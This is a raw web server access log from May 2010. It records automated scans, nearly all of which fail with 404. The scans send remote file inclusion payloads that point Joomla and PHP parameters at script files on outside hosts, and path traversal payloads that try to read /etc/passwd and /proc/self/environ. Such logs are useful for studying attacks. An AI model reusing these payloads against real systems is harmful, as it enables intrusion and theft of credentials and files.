58.180.42.218 - - [23/May/2010:05:22:19 -0500] "GET //skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:05:22:19 -0500] "GET /logs/access_log.1262822400//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:05:22:19 -0500] "GET /logs/access_log.1263081600//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:22:21 -0500] "GET /logs/access_log.1271635200//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:22:35 -0500] "GET /logs/access_log.1264982400//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:22:38 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:22:38 -0500] "GET /logs/access_log.1266537600//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:22:38 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:23:09 -0500] "GET /logs/access_log.1262822400//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
194.79.28.66 - - [23/May/2010:05:23:36 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
204.188.235.66 - - [23/May/2010:05:23:44 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.133.201.194 - - [23/May/2010:05:27:09 -0500] "GET /logs/access_log.1272067200//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:05:27:09 -0500] "GET //index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:05:27:09 -0500] "GET /logs//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:05:27:15 -0500] "GET /logs/access_log.1272240000//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:28:53 -0500] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:28:53 -0500] "GET /logs/access_log.1270944000/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:28:53 -0500] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:00 -0500] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:00 -0500] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:00 -0500] "GET /logs/access_log.1270944000/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:12 -0500] "GET /logs/access_log.1270944000/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:13 -0500] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:13 -0500] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:13 -0500] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:13 -0500] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:29:14 -0500] "GET /logs/access_log.1270944000/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.13.48 - - [23/May/2010:05:29:32 -0500] "GET /logs/access_log.1265932800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.177.125 - - [23/May/2010:05:33:02 -0500] "GET //index1.php?choix=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:02 -0500] "GET /logs//index1.php?choix=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:02 -0500] "GET /logs/access_log.1272067200//index1.php?choix=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:05 -0500] "GET /logs//index1.php?choix=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:05 -0500] "GET //index1.php?choix=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:05 -0500] "GET /logs/access_log.1272067200//index1.php?choix=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:08 -0500] "GET /logs//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:08 -0500] "GET //index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:08 -0500] "GET /logs/access_log.1272067200//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:09 -0500] "GET /logs/access_log.1272240000//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:10 -0500] "GET /logs/access_log.1272240000//index1.php?choix=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:11 -0500] "GET /logs//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:11 -0500] "GET //index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:11 -0500] "GET /logs/access_log.1272067200//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:12 -0500] "GET /logs/access_log.1272240000//index1.php?choix=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [23/May/2010:05:33:14 -0500] "GET /logs/access_log.1272240000//index1.php?choix=http://www.kangnung.org//zb//s1.txt?????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:05:34:43 -0500] "GET /logs/access_log.1178064000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.192 - - [23/May/2010:05:36:32 -0500] "GET /logs/access_log.1174262400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.167.65.30 - - [23/May/2010:05:43:23 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:05:43:23 -0500] "GET /logs/access_log.1271548800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:05:43:23 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
217.112.35.52 - - [23/May/2010:05:43:47 -0500] "GET /logs/access_log.1271548800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
217.112.35.52 - - [23/May/2010:05:43:47 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
217.112.35.52 - - [23/May/2010:05:43:47 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:05:44:24 -0500] "GET /logs/access_log.1266019200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
217.112.35.52 - - [23/May/2010:05:44:35 -0500] "GET /logs/access_log.1266019200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:46:51 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:46:59 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.46.195.240 - - [23/May/2010:05:47:02 -0500] "GET /logs/access_log.1216771200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.61.185.200 - - [23/May/2010:05:47:05 -0500] "GET /logs/access_log.1271548800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:47:25 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:47:26 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:47:26 -0500] "GET /logs/access_log.1271548800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:48:41 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:48:41 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:48:46 -0500] "GET /logs/access_log.1271548800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:49:08 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:49:11 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:49:16 -0500] "GET /logs/access_log.1270771200//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:50:01 -0500] "GET /logs/access_log.1264118400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:05:51:17 -0500] "GET /logs/access_log.1264118400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.55.146.140 - - [23/May/2010:05:52:30 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:05:52:31 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
121.78.118.123 - - [23/May/2010:05:52:43 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.55.146.140 - - [23/May/2010:05:52:52 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:05:52:53 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.5.54.51 - - [23/May/2010:05:53:32 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [23/May/2010:05:53:32 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.55.146.140 - - [23/May/2010:05:53:42 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.5.54.51 - - [23/May/2010:05:53:58 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [23/May/2010:05:54:20 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [23/May/2010:05:54:20 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.236.37.218 - - [23/May/2010:05:54:24 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
99.198.118.114 - - [23/May/2010:05:54:24 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
173.236.37.218 - - [23/May/2010:05:54:38 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
173.236.37.218 - - [23/May/2010:05:54:38 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
64.22.87.208 - - [23/May/2010:05:54:40 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.45.185.178 - - [23/May/2010:05:54:48 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.59.218 - - [23/May/2010:05:54:54 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.195.240 - - [23/May/2010:05:55:33 -0500] "GET /logs/access_log.1218412800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
99.198.118.114 - - [23/May/2010:05:55:37 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
99.198.118.114 - - [23/May/2010:05:55:37 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.22.87.208 - - [23/May/2010:05:55:40 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
64.22.87.208 - - [23/May/2010:05:55:40 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:05:55:51 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:05:55:51 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:05:55:51 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
212.241.251.224 - - [23/May/2010:05:56:06 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:05:56:07 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.163.162.245 - - [23/May/2010:05:56:07 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
97.74.75.246 - - [23/May/2010:05:56:29 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:05:56:29 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.45.185.178 - - [23/May/2010:05:56:48 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
204.188.235.66 - - [23/May/2010:05:56:48 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
204.188.235.66 - - [23/May/2010:05:56:48 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
204.188.235.66 - - [23/May/2010:05:56:48 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.45.185.178 - - [23/May/2010:05:56:48 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:05:57:07 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.59.218 - - [23/May/2010:05:57:14 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.121.59.218 - - [23/May/2010:05:57:14 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
210.219.173.32 - - [23/May/2010:05:57:22 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:05:57:25 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:05:57:25 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [23/May/2010:05:57:25 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.45.185.154 - - [23/May/2010:05:57:25 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:05:57:25 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
97.74.75.246 - - [23/May/2010:05:57:26 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.89.55.2 - - [23/May/2010:05:57:26 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.5.54.51 - - [23/May/2010:05:57:29 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [23/May/2010:05:57:29 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.5.54.51 - - [23/May/2010:05:57:29 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.236.37.218 - - [23/May/2010:05:57:31 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
173.236.37.218 - - [23/May/2010:05:57:31 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
173.236.37.218 - - [23/May/2010:05:57:31 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
99.198.118.114 - - [23/May/2010:05:57:38 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
99.198.118.114 - - [23/May/2010:05:57:38 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
99.198.118.114 - - [23/May/2010:05:57:38 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
97.74.75.246 - - [23/May/2010:05:57:45 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:05:57:45 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
64.22.87.208 - - [23/May/2010:05:57:46 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.22.87.208 - - [23/May/2010:05:57:47 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
64.22.87.208 - - [23/May/2010:05:57:47 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.5.54.51 - - [23/May/2010:05:57:51 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
72.5.54.51 - - [23/May/2010:05:57:51 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
